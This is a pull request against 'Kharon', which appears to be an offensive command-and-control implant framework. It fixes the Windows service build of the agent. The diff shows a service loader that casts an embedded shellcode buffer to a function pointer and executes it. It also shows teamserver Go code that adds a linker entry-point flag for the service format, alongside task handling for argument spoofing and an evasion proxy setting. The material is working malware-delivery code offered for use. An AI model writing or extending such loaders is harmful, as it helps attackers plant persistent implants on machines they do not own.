### PR TITLE
Fix SVC Compilation Format during Agent Generation

### DIFF
--- a/agent_kharon/src_loader/Source/Main/Svc.cc
+++ b/agent_kharon/src_loader/Source/Main/Svc.cc
@@ -1,10 +1,10 @@
 #include <Kharon.h>
 #include <Shellcode.h>
 
-SERVICE_STATUS ServiceStatus = {0};
-SERVICE_STATUS_HANDLE ServiceStatusHandle = NULL;
+SERVICE_STATUS              ServiceStatus       = {0};
+SERVICE_STATUS_HANDLE       ServiceStatusHandle = NULL;
 
-VOID WINAPI ServiceMain( ULONG argc, CHAR *argv );
+VOID WINAPI ServiceMain( DWORD argc, LPWSTR *argv );
 VOID WINAPI ServiceCtrlHandler( ULONG Ctrl );
 VOID RunKharon( VOID );
 
@@ -23,35 +23,34 @@ VOID WINAPI ServiceCtrlHandler( ULONG Ctrl ) {
             break;
     }
 
-    SetServiceStatus(ServiceStatusHandle, &ServiceStatus);
+    SetServiceStatus( ServiceStatusHandle, &ServiceStatus );
 }
 
-VOID RunKharon(VOID) {
+VOID RunKharon( VOID ) {
     VOID(*Kharon)(VOID) = (decltype(Kharon))Shellcode::Data;
-    
+
     if ( Kharon ) {
         Kharon();
     }
 }
 
-VOID WINAPI ServiceMain( ULONG argc, CHAR *argv ) {
-    ServiceStatusHandle = RegisterServiceCtrlHandler( TEXT("Kharon"), ServiceCtrlHandler );
+VOID WINAPI ServiceMain( DWORD argc, LPWSTR *argv ) {
+    ServiceStatusHandle = RegisterServiceCtrlHandlerW( L"Kharon", ServiceCtrlHandler );
 
-    if ( ! ServiceStatusHandle ) {
-        return;
-    }
+    if ( !ServiceStatusHandle ) return;
 
-    ServiceStatus.dwServiceType      = SERVICE_WIN32_OWN_PROCESS;
-    ServiceStatus.dwCurrentState     = SERVICE_START_PENDING;
-    ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
-    ServiceStatus.dwWin32ExitCode    = 0;
+    ServiceStatus.dwServiceType             = SERVICE_WIN32_OWN_PROCESS;
+    ServiceStatus.dwCurrentState            = SERVICE_START_PENDING;
+    ServiceStatus.dwControlsAccepted        = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
+    ServiceStatus.dwWin32ExitCode           = 0;
     ServiceStatus.dwServiceSpecificExitCode = 0;
-    ServiceStatus.dwCheckPoint       = 0;
-    ServiceStatus.dwWaitHint         = 0;
+    ServiceStatus.dwCheckPoint              = 0;
+    ServiceStatus.dwWaitHint                = 3000;
 
     SetServiceStatus( ServiceStatusHandle, &ServiceStatus );
 
     ServiceStatus.dwCurrentState = SERVICE_RUNNING;
+    ServiceStatus.dwWaitHint     = 0;
     SetServiceStatus( ServiceStatusHandle, &ServiceStatus );
 
     RunKharon();
@@ -66,12 +65,11 @@ auto WINAPI WinMain(
     _In_ LPSTR     CommandLine,
     _In_ INT32     ShowCmd
 ) -> INT32 {
-    SERVICE_TABLE_ENTRY ServiceTable[] = { { TEXT("Kharon"), ServiceMain }, { nullptr, nullptr } };
+    SERVICE_TABLE_ENTRYW ServiceTable[] = { { (LPWSTR)L"Kharon", ServiceMain }, { nullptr, nullptr } };
 
-    if ( ! StartServiceCtrlDispatcher( ServiceTable ) ) {
+    if ( !StartServiceCtrlDispatcherW( ServiceTable ) ) {
         RunKharon();
     }
 
     return 0;
 }
-

--- a/agent_kharon/src_server/pl_agent.go
+++ b/agent_kharon/src_server/pl_agent.go
@@ -460,9 +460,13 @@ func AgentGenerateBuild(agentConfig string, agentProfile []byte, listenerMap map
 			"-ladvapi32",
 		}
 
-		if cfg.Format == "Dll" {
+		switch cfg.Format {
+		case "Dll":
 			clangArgs = append(clangArgs, "-shared")
 			fmt.Println("DEBUG: Added -shared flag for DLL compilation")
+		case "Svc":
+			clangArgs = append(clangArgs, "-Wl,-e,WinMain")
+			fmt.Println("DEBUG: Added -e WinMain entry point for Svc compilation")
 		}
 
 		fmt.Printf("→ Running clang++: %v\n", clangArgs)
@@ -1026,7 +1030,7 @@ func CreateTask(ts Teamserver, agent ax.AgentData, args map[string]any) (ax.Task
 				goto RET
 			}
 
-			if ( len(kharon_cfg.Ps.Spoofarg) > 0 ) {
+			if len(kharon_cfg.Ps.Spoofarg) > 0 {
 				if len(programArgs) > len(kharon_cfg.Ps.Spoofarg) {
 					err = errors.New("Spoof argument needs be greater than legit args")
 					goto RET
@@ -1775,7 +1779,7 @@ func CreateTask(ts Teamserver, agent ax.AgentData, args map[string]any) (ax.Task
 			}
 
 			boolean := enabled == 1
-			
+
 			kharon_cfg.Evasion.BofProxy = boolean
 			kharon_cfg.JsonMarshal(&agent, true)
 
@@ -2030,7 +2034,7 @@ func ProcessTasksResult(ts Teamserver, agentData ax.AgentData, taskData ax.TaskD
 			case CALLBACK_INFO:
 				task.MessageType = MESSAGE_INFO
 				task.Message = packer.ParseString()
-			
+
 			default:
 				output := packer.ParseString()
 


### PR DESCRIPTION
Changed types to Wide and included WinMain during compilation in the clang args.